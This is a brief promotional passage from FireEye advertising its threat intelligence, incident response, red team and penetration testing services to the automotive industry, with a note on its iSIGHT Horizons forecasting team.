        FireEye combines our industry-leading threat intelligence, incident response and red team capabilities with our ICS domain expertise to help the automotive industry improve its prevention, detection and response capabilities. FireEye’s Red Team Operations and Penetration Tests can provide firms in the automotive industry experience responding to real-world attacks without the risk of negative headlines. A one-time risk assessment is not enough, because attackers are constantly evolving.

        For more information, contact FireEye.

        FireEye iSIGHT Intelligence’s Horizons Team conducts strategic forecasting to anticipate risks posed by emerging technologies and geopolitical developments, helping clients and the public better assess their exposure to a dynamic cyber threat landscape.